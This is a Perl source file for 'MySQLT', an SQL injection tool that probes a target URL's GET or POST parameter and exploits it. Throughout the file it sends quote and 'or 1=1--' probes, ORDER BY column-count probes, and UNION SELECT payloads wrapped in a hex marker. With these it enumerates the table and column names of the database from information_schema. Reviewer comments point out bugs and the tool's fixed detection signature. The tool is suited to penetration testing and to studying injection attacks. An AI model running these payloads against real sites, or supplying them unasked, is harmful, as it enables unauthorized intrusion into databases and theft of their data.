- use strict;
- use warnings;
- use Getopt::Long ();
- use HTML::Parser;
- use LWP::UserAgent;
- use Scalar::Util qw(looks_like_number);
- use HTTP::Request::Common qw(POST);
- # _____ ________________ .____ ___________
- # / \ ___.__./ _____\_____ \ | | \__ ___/
- # / \ / < | |\_____ \ / / \ \| | | |
- # / Y \___ |/ / \_/. | |___| |
- # \____|__ / ____/_______ \_____\ \_|_______ |____|
- # \/\/ \/ \__> \/
- # SQL Injection testing tool for MySQL
# Print an optional error message followed by the usage text to STDERR,
# then terminate the program.
#
# $message  optional text shown above the usage banner; a trailing newline
#           is appended when it does not already end in one.
# Never returns: dies with a bare "\n", so Perl prints no "at FILE line N"
# suffix and the caller's process exits with the message already shown.
sub usage {
    my ($message) = @_;
    if (defined $message && length $message) {
        $message .= "\n" if $message !~ /\n$/;
    }
    # Program name without its directory part, for the usage line.
    (my $command = $0) =~ s#^.*/##;
    my $banner = join '',
        "MySQLT - SQL Injection testing tool for MySQL\n",
        "usage: $command -u url (-p POST | -g GET) -v true value -e extra [-c]\n",
        " ...\n",
        " ...\n",
        " Mattia Paccamiccio && Matteo Cecconi \n";
    print STDERR ($message, $banner);
    die "\n";
}
# --- Command-line options. These are file-level lexicals; the subs below
# read them directly instead of taking arguments. ---
my $inputurl;   # -u  target URL
my $post;       # -p  name of the POST form field to test
my $get;        # -g  name of the GET query parameter to test
my $value;      # -v  a value the parameter normally accepts ("true value")
my $extra;      # -e  parsed but never read anywhere in this script
my $enum;       # -c  flag: also run the enumeration steps after the tests
my $ua = LWP::UserAgent->new;   # no agent string is set, so LWP's default
                                # User-Agent header is sent with every request
# --- Shared state mutated by the subs below ---
my @match;          # text nodes collected by text_handler() from parsed pages
my @outputcolno;    # column positions echoed back by the page (columns_analyze)
my @tablenames;     # filled by extract_tablenames()
my @columnnames;    # filled by extract_columnnames()
my $column_last = 0;    # column count found by the ORDER BY loop below
my $column_no = 1;      # ORDER BY position currently being tried
my $query_select;       # request string under construction (enumeration subs)
my $req2;
my $req;
my $req3;
my $response;       # baseline response (set by check_injectable, later overwritten)
my $response2;      # response to the value with a trailing quote
my $response3;      # response to the current ORDER BY probe
my $parser;
my $x = 0;          # loop flag for the column-count loop: 1 once a count is found
my $outputcolumnno; # column position typed on STDIN in the -c branch
my $dbname;         # never assigned; the extract_dbname calls are commented out
Getopt::Long::GetOptions(
    'u=s' => \$inputurl,
    'p=s' => \$post,
    'g=s' => \$get,
    'v=s' => \$value,
    'e=s' => \$extra,
    'c' => \$enum
    # 's=s' => sub {
    # local *_ = \$_[1];
    # /^([^:]+):(\d+)$/
    # or die("Invalid format for option s.\n");
    # $host = $1;
    # $port = $2;
    # },
)
    or usage("Invalid commmand line options.");
usage("missing url.")
    unless defined $inputurl;
# Parses as (defined $post) or $get: passes when either option was given.
usage("missing request")
    unless defined $post or $get;
usage("missing value.")
    unless defined $value;
if(defined $get and defined $post) {usage("cannot inject 2 varibles together");}
print '
_____ ________________ .____ ___________
/ \ ___.__./ _____\_____ \ | | \__ ___/
/ \ / < | |\_____ \ / / \ \| | | |
/ Y \___ |/ / \_/. | |___| |
\____|__ / ____/_______ \_____\ \_|_______ |____|
\/\/ \/ \__> \/
SQL Injection testing tool for MySQL
Developed by Mattia Paccamiccio & Matteo Cecconi
';
# Step 1: plain value vs. value with a trailing quote. Exits the program with
# "Not vulnerable." when the first text nodes of the two pages agree.
check_injectable();
# Step 2: "-value" vs. "-value or 1=1--". Exits silently when they agree.
is_vuln();
#### ADD OR 1=1   (original note, Italian: "AGGIUNGERE OR 1=1")
# Step 3: find the column count of the injected SELECT by sending
# "<value> order by N--" for N = 1, 2, 3, ... until column_test() reports a
# difference from the baseline page. There is no upper bound: a target whose
# page never changes keeps this loop sending requests indefinitely.
while ($x == 0) {
    print "column number test: $column_no \n";
    my $test;
    if(defined $post) {
        $req3 = POST $inputurl,
            [ $post => $value." order by $column_no--", errors => 0 ];   # errors=0 is an extra fixed form field
        $response3 = $ua->request($req3);
        # This parse appends to @match, but column_test() clears @match and
        # re-parses both pages itself, so it has no effect on the result.
        $parser = HTML::Parser->new( 'text_h' => [ \&text_handler, 'dtext' ] );
        $parser->parse( $response3->decoded_content );
        $test = &column_test();
    } elsif (defined $get) {
        # GET variant: the probe is interpolated into the query string with
        # "+" standing in for spaces.
        $response3 = $ua->get("$inputurl?$get=$value+order+by+$column_no--");
        $parser = HTML::Parser->new( 'text_h' => [ \&text_handler, 'dtext' ] );
        $parser->parse( $response3->decoded_content );
        $test = &column_test();
    }
    # column_test() returns a number only when the probe page differs from
    # the baseline; that number is also stored in the file-level $column_last.
    if(looks_like_number($test)){
        print "last column #:";
        print &column_test();   # re-parses the same two responses and prints the count again
        print "\n";
        $x = 1;
    } else {
        $column_no++;
    }
}
# Step 4 (only with -c): find which column positions are reflected in the page.
if(defined $enum) {
    if (defined $post) { #post
        columns_analyze($inputurl,$post,$value,$column_last);
    } elsif (defined $get) { #get
        columns_analyze($inputurl,$get,$value,$column_last);
    }
    print "Columns which give an output are: ";
    foreach my $colno (@outputcolno) {
        print $colno." ";
    }
}
# Step 5 (only with -c): ask for one of the reflected columns and enumerate
# the current schema through it. The STDIN answer is used without any
# validation (see the "validate colnumber" note below).
if(defined $enum) {
    print "\n Type the column number: ";
    $outputcolumnno = <STDIN>;
    chomp $outputcolumnno;
    ##### validate colnumber   (original note, Italian: "fai controllo colnumber")
    #if (defined $post) {
    # $dbname = extract_dbname($inputurl,$post,$value,$column_last);
    #} elsif (defined $get) {
    # $dbname = extract_dbname($inputurl,$get,$value,$column_last);
    #}
    # $dbname is still undef here; both subs unpack only their first four
    # arguments, so the fifth is ignored.
    if (defined $post) {
        extract_tablenames($inputurl,$post,$value,$column_last,$dbname);
        extract_columnnames($inputurl,$post,$value,$column_last,$dbname);
    } elsif (defined $get) {
        extract_tablenames($inputurl,$get,$value,$column_last,$dbname);
        extract_columnnames($inputurl,$get,$value,$column_last,$dbname);
    }
}
# HTML::Parser text callback: receives each decoded text node ('dtext') of a
# parsed page and appends it to the shared @match list.
#
# The condition is an empty pattern. In Perl an empty pattern does not mean
# "match nothing": it re-uses the last successfully matched regex, and when
# there is none it matches the empty string, i.e. succeeds on every text.
# For the early steps this therefore collects every text node; once one of
# the MySQLTTest regexes in the enumeration subs has succeeded, the filter
# applied here may change silently — NOTE(review): looks unintended, confirm.
sub text_handler {
    chomp( my $text = shift );
    if ( $text =~ //i ) {
        push @match,$text;
        #print "Matched: $text\n\n\n";
    }
    #foreach(@match) {
    #print $_, "\n";
    #}
}
# Step 1 of the scan: request the parameter with its normal value and once
# more with a single quote appended, then compare the text nodes of the two
# pages.
#
# Takes no arguments; reads the file-level $inputurl, $post/$get, $value and
# $ua. Stores the requests in $req/$req2 and the responses in
# $response/$response2 ($response is reused as the baseline by column_test)
# and fills @match through text_handler(). Every POST body also carries the
# fixed extra form field errors=0.
#
# Comparison: @match holds the nodes of page 1 followed by those of page 2,
# and the two halves are compared position by position. This assumes both
# pages yield the same number of text nodes; a different count misaligns
# the pairs. In practice only the first pair is ever inspected: an unequal
# pair prints "Seems vulnerable..." and leaves the loop, an equal pair
# prints "Not vulnerable." and exits the whole program.
sub check_injectable {
    if(defined $post){
        $req = POST $inputurl,
            [ $post => $value, errors => 0 ];
        $req2 = POST $inputurl,
            [ $post => $value."'", errors => 0 ];
        $response = $ua->request($req);
        $response2 = $ua->request($req2);
    } elsif (defined $get) {
        # GET variant: the value and the trailing quote go straight into the URL.
        $response = $ua->get("$inputurl?$get=$value");
        $response2 = $ua->get("$inputurl?$get=$value'");
    }
    # Two fresh parsers; both append to the same @match.
    $parser = HTML::Parser->new( 'text_h' => [ \&text_handler, 'dtext' ] );
    $parser->parse( $response->decoded_content );
    $parser = HTML::Parser->new( 'text_h' => [ \&text_handler, 'dtext' ] );
    $parser->parse( $response2->decoded_content );
    my $arrsize = scalar @match;
    my $halfarr = ($arrsize/2);
    my $arrincrement = $halfarr;
    for (my $cnt=0; $cnt<$halfarr ; $cnt++) {
        my $cnt2 = $cnt+$arrincrement;   # index of the matching node of page 2
        if ($match[$cnt] ne $match[$cnt2]) {
            #print "$match[$cnt] $match[$cnt2] \n";
            $cnt = $halfarr;   # redundant with the `last` that follows
            print "Seems vulnerable, trying to exploit...\n";
            last;
        }
        else {
            #print "$match[$cnt] $match[$cnt2] \n";
            print "Not vulnerable.";
            exit;   # terminates the program, not just this sub
        }
    }
}
# Step 2 of the scan: compare the page for "-<value>" with the page for
# "-<value> or 1=1--", again by pairwise comparison of text nodes.
#
# Takes no arguments; clears @match first. $req_v/$req2_v are built for the
# POST case, but the request calls below send $req/$req2 — the two requests
# prepared by check_injectable() — so only the GET branch actually sends the
# negated value. The GET URL is built by plain interpolation, spaces included.
#
# Only the first pair of text nodes is inspected: an unequal pair prints
# "Vulnerable!" and leaves the loop; an equal pair exits the whole program
# (the `return` after `exit` is unreachable). If either page produced no
# text nodes the loop body never runs and the sub simply returns.
sub is_vuln {
    @match = ();
    my $neg = "-".$value;
    my $req_v;
    my $req2_v;
    my $response_v;
    my $response2_v;
    if(defined $post){
        $req_v = POST $inputurl,
            [ $post => $neg, errors => 0 ];
        $req2_v = POST $inputurl,
            [ $post => $neg." or 1=1--", errors => 0 ];
        $response_v = $ua->request($req);    # sends check_injectable's $req, not $req_v
        $response2_v = $ua->request($req2);  # sends check_injectable's $req2, not $req2_v
    } elsif (defined $get) {
        $response_v = $ua->get("$inputurl?$get=$neg");
        $response2_v = $ua->get("$inputurl?$get=$neg or 1=1--");
    }
    $parser = HTML::Parser->new( 'text_h' => [ \&text_handler, 'dtext' ] );
    $parser->parse( $response_v->decoded_content );
    $parser = HTML::Parser->new( 'text_h' => [ \&text_handler, 'dtext' ] );
    $parser->parse( $response2_v->decoded_content );
    my $arrsize = scalar @match;
    my $halfarr = ($arrsize/2);
    my $arrincrement = $halfarr;
    for (my $cnt=0; $cnt<$halfarr ; $cnt++) {
        my $cnt2 = $cnt+$arrincrement;   # index of the matching node of page 2
        if ($match[$cnt] ne $match[$cnt2]) {
            print "Vulnerable!\n";
            last;
        }
        else {
            exit;     # terminates the program
            return;   # never reached
        }
    }
}
# Compare the baseline page ($response, from check_injectable) with the page
# for the current ORDER BY probe ($response3, set by the main loop).
#
# Takes no arguments. Clears @match and rebuilds it from both pages, then
# looks at the first pair of text nodes only — both branches of the `if`
# return on the first iteration:
#   different → stores $column_no - 1 in the file-level $column_last and
#               returns that number
#   equal     → bare return (undef in scalar context)
# If either page produced no text nodes the loop body never runs and the
# sub falls off the end without a meaningful return value.
sub column_test {
    @match = ();
    $parser = HTML::Parser->new( 'text_h' => [ \&text_handler, 'dtext' ] );
    $parser->parse( $response->decoded_content );
    $parser = HTML::Parser->new( 'text_h' => [ \&text_handler, 'dtext' ] );
    $parser->parse( $response3->decoded_content );
    my $arrsize = scalar @match;
    my $halfarr = ($arrsize/2);
    my $arrincrement = $halfarr;
    for (my $cnt=0; $cnt<$halfarr ; $cnt++) {
        my $cnt2 = $cnt+$arrincrement;   # index of the matching node of page 2
        if ($match[$cnt] ne $match[$cnt2]) {
            # The probe that changed the page is one past the real column count.
            $column_last = $column_no-1;
            return $column_last;
        }
        else {
            return;
        }
    }
}
# Step 4: determine which column positions of the injected SELECT are
# reflected in the page.
#
# Called as columns_analyze($url, $param, $value, $column_count). The
# `my (...)` unpacking is scoped to the if/elsif block, so the loop and the
# request code below use the file-level $column_last, $value, $post and $get
# (the caller passes those same variables, so the values agree).
#
# Builds "<value> union select concat(M,1,M),concat(M,2,M),...--" where M is
# 0x4d7953514c5454657374, the hex encoding of the literal "MySQLTTest" that
# the regex at the bottom looks for. Each column position whose number comes
# back wrapped in the marker is pushed onto the file-level @outputcolno.
# In the GET case $target_url stays undef; the full URL is held in
# $query_select instead. Overwrites the file-level $req/$response/@match.
#
# Detection note: the marker bytes and the "union select concat(0x4d79..."
# shape are constant in every request this tool sends.
sub columns_analyze {
    my $target_url;
    my $form;
    @match = ();
    if(defined $post) { #POST
        my ($targeturl,$post,$value,$column_last) = @_;   # block-scoped shadows
        $target_url = $targeturl;
        $query_select = "$value union select ";
        $form = $post;
    } elsif(defined $get) { #GET
        my ($targeturl,$get,$value,$column_last) = @_;   # block-scoped shadows
        $query_select = $targeturl."?".$get."=".$value."+union+select+";
    }
    # One concat(marker,i,marker) per column; the last one closes with "--".
    for (my $i=1;$i<=$column_last;$i++) {
        if($i<$column_last) {
            $query_select = $query_select."concat(0x4d7953514c5454657374,".$i.",0x4d7953514c5454657374),";
        } elsif($i == $column_last) {
            $query_select = $query_select."concat(0x4d7953514c5454657374,".$i.",0x4d7953514c5454657374)--";
        }
    }
    if(defined $post) {
        $req = POST $target_url,
            [ $form => $query_select, errors => 0 ];
        $response = $ua->request($req);
        $parser = HTML::Parser->new( 'text_h' => [ \&text_handler, 'dtext' ] );
        $parser->parse( $response->decoded_content );
    } elsif(defined $get) {
        $response = $ua->get($query_select);
        $parser = HTML::Parser->new( 'text_h' => [ \&text_handler, 'dtext' ] );
        $parser->parse( $response->decoded_content );
    }
    # A text node of the form MySQLTTest<n>MySQLTTest means column <n> is shown.
    foreach my $match (@match) {
        if ($match =~ m/MySQLTTest(.*)MySQLTTest/) {
            if(looks_like_number($1)) {
                push @outputcolno, $1;
            }
        }
    }
}
# Step 5a: list the table names of the current database through the
# reflected column chosen on STDIN ($outputcolumnno).
#
# Called as extract_tablenames($url, $param, $value, $column_count, $dbname);
# only the first four arguments are unpacked, and — as in columns_analyze —
# only inside the if/elsif block, so the loops below use the file-level
# $column_last. The fifth argument is ignored.
#
# Two phases, both placing a MySQLTTest-wrapped expression in column
# $outputcolumnno and the bare index in every other position:
#   1. one request for count(*) from information_schema.tables where
#      table_schema = database(); the echoed number becomes
#      $schema_tablenumber.
#   2. a template ending in "limit TABLECOUNTERZ,1--"; for $i = 1 .. count
#      the placeholder is replaced by $i (split on it, join with $i), one
#      request per offset, and each echoed table_name is pushed onto the
#      file-level @tablenames. Offsets start at 1, so rows 1..count of the
#      result are requested.
# $query_select is reset to its prefix between the phases. If
# $outputcolumnno is not a position in 1..$column_last no concat() is
# emitted and nothing is ever matched. Overwrites $req/$response/@match.
sub extract_tablenames {
    my $target_url;
    my $form;
    my $schema_tablenumber;
    @match = ();
    if(defined $post) {
        my ($targeturl,$post,$value,$column_last) = @_;   # block-scoped shadows
        $target_url = $targeturl;
        $query_select = "$value union select ";
        $form = $post;
    } elsif(defined $get) {
        my ($targeturl,$get,$value,$column_last) = @_;   # block-scoped shadows
        $target_url = $targeturl;
        $query_select = $targeturl."?".$get."=".$value." union select ";
    }
    # Phase 1 request: count(*) in the reflected column, index elsewhere.
    for (my $i=1;$i<=$column_last;$i++) {
        if($i<$column_last && $i != $outputcolumnno) {
            $query_select = $query_select.$i.",";
        } elsif($i == $column_last && $i != $outputcolumnno) {
            $query_select = $query_select.$i." from information_schema.tables where table_schema = database()--";
        } elsif($i < $column_last && $i == $outputcolumnno) {
            $query_select = $query_select."concat(0x4d7953514c5454657374,count(*),0x4d7953514c5454657374),";
        } elsif($i == $column_last && $i == $outputcolumnno) {
            $query_select = $query_select."concat(0x4d7953514c5454657374,count(*),0x4d7953514c5454657374) from information_schema.tables where table_schema = database()--";
        }
    }
    if(defined $post) {
        $req = POST $target_url,
            [ $form => $query_select, errors => 0 ];
        $response = $ua->request($req);
        $parser = HTML::Parser->new( 'text_h' => [ \&text_handler, 'dtext' ] );
        $parser->parse( $response->decoded_content );
        $query_select = "$value union select ";   # reset prefix for phase 2
    } elsif(defined $get) {
        $response = $ua->get($query_select);
        $parser = HTML::Parser->new( 'text_h' => [ \&text_handler, 'dtext' ] );
        $parser->parse( $response->decoded_content );
        $query_select = $target_url."?".$get."=".$value." union select ";   # reset prefix for phase 2
    }
    # The last marker-wrapped node wins if several are present.
    foreach my $match (@match) {
        if ($match =~ m/MySQLTTest(.*)MySQLTTest/) {
            $schema_tablenumber = $1;
        }
    }
    @match = ();
    # Phase 2 template with the TABLECOUNTERZ placeholder for the LIMIT offset.
    for (my $i=1;$i<=$column_last;$i++) {
        if($i<$column_last && $i != $outputcolumnno) {
            $query_select = $query_select.$i.",";
        } elsif($i == $column_last && $i != $outputcolumnno) {
            $query_select = $query_select.$i." from information_schema.tables where table_schema = database() limit TABLECOUNTERZ,1--";
        } elsif($i < $column_last && $i == $outputcolumnno) {
            $query_select = $query_select."concat(0x4d7953514c5454657374,table_name,0x4d7953514c5454657374),";
        } elsif($i == $column_last && $i == $outputcolumnno) {
            $query_select = $query_select."concat(0x4d7953514c5454657374,table_name,0x4d7953514c5454657374) from information_schema.tables where table_schema = database() limit TABLECOUNTERZ,1--";
        }
    }
    # One request per offset 1..$schema_tablenumber (undef count → no requests).
    for (my $i=1;$i<=$schema_tablenumber;$i++) {
        @match = ();
        my $extract1 = join( $i, split("TABLECOUNTERZ", $query_select) );   # placeholder → $i
        if (defined $post) {
            $req = POST $target_url,
                [ $form => $extract1, errors => 0 ];
            $response = $ua->request($req);
            $parser = HTML::Parser->new( 'text_h' => [ \&text_handler, 'dtext' ] );
            $parser->parse( $response->decoded_content );
        } elsif (defined $get) {
            $response = $ua->get($extract1);
            $parser = HTML::Parser->new( 'text_h' => [ \&text_handler, 'dtext' ] );
            $parser->parse( $response->decoded_content );
        }
        foreach my $match (@match) {
            if ($match =~ m/MySQLTTest(.*)MySQLTTest/) {
                push @tablenames, $1;
            }
        }
    }
}
# Step 5b: for every table collected in @tablenames, list its column names
# through the reflected column $outputcolumnno.
#
# Same calling convention and block-scoped argument unpacking as
# extract_tablenames (the unpacking is repeated on every foreach iteration;
# the loops use the file-level $column_last). Per table:
#   1. one request for count(*) from information_schema.columns where
#      table_schema = database() and table_name = '<table>'; the table name
#      taken from the previous response is concatenated into the request
#      string as-is, without quoting or escaping;
#   2. when the echoed count is found, build a "limit COLUMNCOUNTERZ,1"
#      template, request offsets 1..count, and push/print each echoed
#      column_name (onto the file-level @columnnames, and to STDOUT).
# Phase 2 runs inside the `foreach my $match (@match)` of phase 1 and
# assigns @match = () while that foreach is still iterating the same array.
# NOTE(review): Perl's foreach aliases the array, so what the remaining
# iterations of the outer loop see depends on which node matched first —
# confirm before relying on more than the first match.
# Overwrites $req/$response/@match; $query_select is left holding the last
# template built.
sub extract_columnnames {
    my $target_url;
    my $form;
    my $schema_columnnumber;   # declared but never used
    my $enum_columnnumber;
    @match = ();
    foreach my $tabs (@tablenames) {
        if(defined $post) {
            my ($targeturl,$post,$value,$column_last) = @_;   # block-scoped shadows
            $target_url = $targeturl;
            $query_select = "$value union select ";
            $form = $post;
        } elsif(defined $get) {
            my ($targeturl,$get,$value,$column_last) = @_;   # block-scoped shadows
            $target_url = $targeturl;
            $query_select = $targeturl."?".$get."=".$value." union select ";
        }
        # Phase 1 request: count(*) in the reflected column, index elsewhere.
        for (my $i=1;$i<=$column_last;$i++) {
            if($i<$column_last && $i != $outputcolumnno) {
                $query_select = $query_select.$i.",";
            } elsif($i == $column_last && $i != $outputcolumnno) {
                $query_select = $query_select.$i." from information_schema.columns where table_schema = database() and table_name = '".$tabs."'--";
            } elsif($i < $column_last && $i == $outputcolumnno) {
                $query_select = $query_select."concat(0x4d7953514c5454657374,count(*),0x4d7953514c5454657374),";
            } elsif($i == $column_last && $i == $outputcolumnno) {
                $query_select = $query_select."concat(0x4d7953514c5454657374,count(*),0x4d7953514c5454657374) from information_schema.columns where table_schema = database() and table_name = '".$tabs."'--";
            }
        }
        #print $query_select;
        if(defined $post) {
            $req = POST $target_url,
                [ $form => $query_select, errors => 0 ];
            $response = $ua->request($req);
            $parser = HTML::Parser->new( 'text_h' => [ \&text_handler, 'dtext' ] );
            $parser->parse( $response->decoded_content );
            $query_select = "$value union select ";   # reset prefix for phase 2
        } elsif(defined $get) {
            $response = $ua->get($query_select);
            $parser = HTML::Parser->new( 'text_h' => [ \&text_handler, 'dtext' ] );
            $parser->parse( $response->decoded_content );
            $query_select = $target_url."?".$get."=".$value." union select ";   # reset prefix for phase 2
        }
        foreach my $match (@match) {
            if ($match =~ m/MySQLTTest(.*)MySQLTTest/) {
                $enum_columnnumber = $1;
                #print "\n counter: ".$1;
                print "\n Enumerating table ".$tabs.": \n";
                @match = ();   # clears the array this foreach is iterating
                # Phase 2 template with the COLUMNCOUNTERZ placeholder for the offset.
                for (my $i=1;$i<=$column_last;$i++) {
                    if($i<$column_last && $i != $outputcolumnno) {
                        $query_select = $query_select.$i.",";
                    } elsif($i == $column_last && $i != $outputcolumnno) {
                        $query_select = $query_select.$i." from information_schema.columns where table_schema = database() and table_name = '".$tabs."' limit COLUMNCOUNTERZ,1--";
                    } elsif($i < $column_last && $i == $outputcolumnno) {
                        $query_select = $query_select."concat(0x4d7953514c5454657374,column_name,0x4d7953514c5454657374),";
                    } elsif($i == $column_last && $i == $outputcolumnno) {
                        $query_select = $query_select."concat(0x4d7953514c5454657374,column_name,0x4d7953514c5454657374) from information_schema.columns where table_schema = database() and table_name = '".$tabs."' limit COLUMNCOUNTERZ,1--";
                    }
                }
                # One request per offset 1..$enum_columnnumber.
                for (my $i=1;$i<=$enum_columnnumber;$i++) {
                    @match = ();
                    my $extract1 = join( $i, split("COLUMNCOUNTERZ", $query_select) );   # placeholder → $i
                    if (defined $post) {
                        $req = POST $target_url,
                            [ $form => $extract1, errors => 0 ];
                        $response = $ua->request($req);
                        $parser = HTML::Parser->new( 'text_h' => [ \&text_handler, 'dtext' ] );
                        $parser->parse( $response->decoded_content );
                    } elsif (defined $get) {
                        $response = $ua->get($extract1);
                        $parser = HTML::Parser->new( 'text_h' => [ \&text_handler, 'dtext' ] );
                        $parser->parse( $response->decoded_content );
                    }
                    foreach my $match (@match) {
                        if ($match =~ m/MySQLTTest(.*)MySQLTTest/) {
                            push @columnnames, $1;
                            print $1." -- ";
                        }
                    }
                }
            }
        }
        @match = ();
    }
}